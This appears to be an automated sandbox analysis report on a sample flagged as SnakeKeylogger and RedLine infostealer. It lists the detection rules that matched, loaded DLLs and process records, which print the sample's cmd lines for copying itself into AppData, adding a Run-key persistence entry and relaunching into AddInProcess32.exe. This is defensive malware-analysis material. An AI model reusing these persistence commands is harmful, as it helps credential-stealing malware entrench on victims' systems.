Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.xxlooa.exe.449537a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.xxlooa.exe.44c8330.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3cf9918.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.File.com.exe.3cc6962.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: AddInProcess32.exe PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: File.com.exe, Cr.cs	Cryptographic APIs: 'CreateDecryptor'
Source: xxlooa.exe.5.dr, Cr.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, -i.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/7@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 17_2_004019F0 OleInitialize,CreateToolhelp32Snapshot,Module32First,FindCloseChangeNotification,LoadLibraryA,

17_2_004019F0

Source: C:\Users\user\Desktop\File.com.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File.com.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03

Source: File.com.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: File.com.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\File.com.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\File.com.exe "C:\Users\user\Desktop\File.com.exe"
Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17
Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\user\Desktop\File.com.exe" "C:\Users\user\AppData\Roaming\xxlooa.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xxlooa.exe "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xxlooa.exe "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xxlooa.exe "C:\Users\user\AppData\Roaming\xxlooa.exe"
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\user\Desktop\File.com.exe" "C:\Users\user\AppData\Roaming\xxlooa.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 17	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 21	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xxlooa.exe "C:\Users\user\AppData\Roaming\xxlooa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Source: C:\Users\user\Desktop\File.com.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
